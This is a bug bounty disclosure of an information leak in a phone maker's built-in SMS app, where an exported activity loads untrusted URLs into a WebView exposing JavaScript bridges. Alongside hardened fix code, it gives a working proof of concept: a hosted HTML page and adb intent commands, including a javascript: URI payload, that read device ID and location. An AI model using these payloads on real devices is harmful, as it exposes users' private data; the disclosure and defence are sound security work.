Information disclosure through a JavaScript bridge in Android

Summary: One of the largest phone manufacturers had an information disclosure vulnerability in its built-in SMS app.

JavaScript Bridge/Interface: The JavaScript-to-Java bridge (a.k.a. JavascriptInterface) is a WebView feature that programmatically installs a Java object into the loaded web page so that its methods can be called from JavaScript.

Description: The built-in app exported “redacted.WebMessageRoutingActivity”, which loads a page in a WebView to sync SMS to the cloud.

Because this activity did not validate the URI passed in its `url` intent extra, any external malicious app could pass arbitrary schemes such as javascript: or file: and have them opened in the WebView. That WebView was bound to the app through several JS bridges, so an attacker could execute JavaScript that called the bridge's functions.
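The root cause is an exported activity that hands an untrusted intent extra straight to WebView.loadUrl() while a JavascriptInterface is attached. The activity below is an added example written for this write-up, not the vendor's code: it gates the URL on an https-only host allow-list before the WebView is created, attaches a minimal bridge only after that check passes, and keeps in-page navigation inside the trusted origin. The package name, the `url` extra name, the ALLOWED_HOSTS values and the SyncBridge class are assumptions modelled on the redacted report; minSdk 24 is assumed for the WebResourceRequest overload.

```java
// Added example, not the vendor's code. Package, extra name, hosts and bridge
// name are placeholders modelled on the redacted report.
package com.example.hardened;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class WebMessageRoutingActivity extends Activity {
    private static final String TAG = "WebMessageRouting";

    // Placeholder hosts: only pages served from these origins may be loaded
    // and may therefore reach the JavaScript bridge.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("sync.example.com", "cloud.example.com"));

    /** True only for an https URL whose host is on the allow-list. */
    static boolean isTrustedUrl(String raw) {
        if (raw == null) return false;
        Uri uri = Uri.parse(raw);
        String scheme = uri.getScheme();
        String host = uri.getHost();
        // Rejects javascript:, file:, content:, intent: and every non-https scheme.
        if (scheme == null || !scheme.equalsIgnoreCase("https")) return false;
        // Reject missing hosts and user-info tricks such as https://trusted@evil.example
        if (host == null || uri.getUserInfo() != null) return false;
        return ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        String url = intent != null ? intent.getStringExtra("url") : null;

        // Validate before the WebView ever sees the value; an untrusted caller
        // (adb or a third-party app) gets nothing but a closed activity.
        if (!isTrustedUrl(url)) {
            Log.w(TAG, "Rejected untrusted url extra");
            finish();
            return;
        }

        WebView webView = new WebView(this);
        setContentView(webView);
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);   // required for the bridge itself
        settings.setAllowFileAccess(false);    // no file:// content in this WebView
        settings.setAllowContentAccess(false); // no content:// either

        // The bridge is attached only after the URL passed the allow-list, and
        // only methods annotated with @JavascriptInterface are callable from JS.
        webView.addJavascriptInterface(new SyncBridge(), "SyncBridge");

        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // Block any navigation that leaves the trusted origin, so a redirect
                // or injected link cannot carry the bridge to another page.
                return !isTrustedUrl(request.getUrl().toString());
            }
        });

        webView.loadUrl(url);
    }

    /** Minimal bridge: exposes only UI state the sync page needs, nothing sensitive. */
    static class SyncBridge {
        private volatile boolean pullToRefreshEnabled = true;

        @JavascriptInterface
        public boolean disablePullToRefresh() {
            pullToRefreshEnabled = false;
            return pullToRefreshEnabled;
        }

        @JavascriptInterface
        public boolean isPullToRefreshEnabled() {
            return pullToRefreshEnabled;
        }
    }
}
```

If the activity does not need to be started by other apps at all, the stronger fix is to declare it with `android:exported="false"` in AndroidManifest.xml, which removes the entry point entirely; the allow-list above is the defence for activities that must stay exported. Location and device identifiers are deliberately absent from the bridge: anything reachable through a JavascriptInterface should be treated as exposed to whichever page is loaded.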

Steps to reproduce:

  • Create an HTML file with the snippet below and host it
<!DOCTYPE html>
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>Index</title>
</head>

<body>
	<script>
	// Object.getOwnPropertyNames(window.RedactedJSBridge).forEach(function(v, x) { document.writeln(v); });  
	// Above returns RedactedJSBridge's functions like (disablePullToRefresh,getCloudHashedDeviceId, getNetworkType, requestLocation)
	document.write(RedactedJSBridge.disablePullToRefresh()); //this was to disable Pull to refresh.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getMiCloudHashedDeviceId()); //this was to retrieve Device ID.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getNetworkType()); //this was to retrieve Network type like mobile or wifi.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.requestLocation(true));
	document.write("\n\n\n");
	document.write(RedactedJSBridge.getLocation());
	//this was to retrieve location info.
	document.write("\n\n\n");
	document.write(RedactedJSBridge.setBottomBarVisible(true));
	document.write("\n\n\n");
	</script>
</body>

</html>
  • There are two ways to reproduce the issue: through ADB, or from a third-party app that sends the intent.
  • Using ADB:

adb shell am start -n com.redacted.page/com.redacted.page.activity.WebMessageRoutingActivity -e url "https://servicenger.com/hostedabovefile.html"

OR

adb shell am start -n com.redacted.page/com.redacted.page.activity.WebMessageRoutingActivity -e url "javascript://%0Adocument.write(RedactedJSBridge.getLocation());"

Result: Using the reproduction above we were able to retrieve sensitive information such as the location and device ID.

Timeline:

  • 11/04/2019 : Reported on HackerOne's private program.
  • 16/04/2019 : Triaged
  • 22/04/2019 : Bounty awarded
  • 21/05/2019 : Fixed in OS update.

Thanks )